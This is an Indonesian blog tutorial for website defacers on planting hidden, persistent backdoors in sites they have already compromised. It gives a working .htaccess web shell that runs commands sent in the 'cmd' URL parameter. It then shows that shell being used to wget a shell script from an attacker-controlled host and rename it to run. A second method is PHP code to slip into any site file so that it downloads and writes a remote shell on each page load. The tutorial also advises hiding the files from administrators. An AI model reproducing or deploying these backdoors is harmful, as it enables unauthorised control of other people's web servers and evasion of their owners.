Pada tutor ini seperti di judul, kita akan membahas cara menyisipkan backdoor ke suatu file,
Masalah terbesar para Defacer adalah ketika file backdoornya di hapus si mimin (admin) atau malah kena Redeface Defacer lain, karena bug (celah) belum di tutup. Pasti pernah kan kek gitu? udah pasti pernah kan? yakan, yakan :v
Ini adalah solusi untuk mengantisipasi kemungkinan diatas.
Method lama cuman gw share kembali, biar manfaat buat para generasi penerus bangsa :3
Oke langsung saja ke triknya,
Disini gw punya 2 cara :
CARA 1
1. Gw asumsikan lu udah punya target atau sudah nanem backdoor di dalem webnya,2. Buat file baru dengan ekstensi .php/.htaccess, isi dengan script ini :
<Files ~ "^\.ht">3. Di contoh ini, file gw kasih nama .htaccess
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>
NOTE:
a. Upayakan file di atas tersimpan di directory yang sekiranya admin tidak akan curiga
b. Fungsi script diatas adalah allow shell command
4. Di langkah ini seharusnya lu udah kebayang kan bagaimana cara kerjanya :v
CARA KERJA SCRIPT :
A. Melihat Isi Sempak :3
1. Untuk menampilkan list directory di server linux, command gini: site/.htaccess?cmd=ls , Kalau make server windows tinggal ganti dengan: dir
2. Hasilnya list akan menyamping, belum nemu cara biar hasilnya bisa rapi kebawah :3
3. Screenshot
B. Menanam Bekdur :v
1. Kita manfaatkan fungsi wget, untuk mengambil script backdoor yang sudah ada di web lain
*Upload file backdoornya di hosting gratisan atau make pastebin jga bisa
2. Command gini: site/.htaccess?cmd=wget http:/www.websitemu.com/shell.php
*File extension terserah (.php , .txt , .jpg , dll) . Di contoh ini make .txt
3. Screenshot
4. Jika sudah di eksekusi, cek lagi dengan command: site/.htaccess?cmd=ls
5. Screenshot
6. Shell sudah masuk, haha :D Jika backdoor yang di wget tdi .php, lu bisa langsung eksekusi. Karena di contoh ini gw make .txt maka harus di rename dulu filenya biar bisa jalan backdoornya, di step berikutnya akan di bahas cara merenamenya (buat yang biasa make linux bisa skip :v , tutorial ini buat yang masih pemula)
C. Rename File
1. Caranya sangat simple,
2. Command gini: site/.htaccess?cmd=mv nama-file-awal nama-yang-diinginkan
3. Screenshot
4. Jika masih penasaran file sudah berubah atau belum, bisa cek dengan: site/.htaccess?cmd=ls
5. Screenshot
6. Tinggal Eksekusi deh, haahahaha :v
F.A.Q
you: Jadi ini cuman mainan di address bar aja iya?
me: Ya, cocok buat yang make addons hackbar (yang injector pasti tau lah :v) lebih mudah :3
CARA 2
1. Seperti di CARA 1, lu harus di dalem website target dulu,2. Script untuk memanggil shellnya :
$nama= fopen("backdoor.php" ,"w+");NOTE:
$file = file_get_contents('http://www.websitemu.com/shell.php');
$tulis = fwrite ($nama ,$file);
fclose($nama);
a. backdoor.php = nama file yang akan dibuat nanti
b. http://www.websitemu.com/shell.php = shell dari website lain (bisa format .php ataupun .txt)
CARA PENGGUNAAN :
1. Sisipkan script di atas, ke file apapun (yang penting ingat namnya) *Harus file berekstensi .php
2. Jika file yang disisipkan script barusan di akses, maka backdoor akan otomatis terbuat
F.A.Q
you: Masa sih bisa langsung terbuat?
me: Langsung di coba aja daripada penasaran :3
Semoga Bermanfaat ^.^
Tidak ada komentar:
Posting Komentar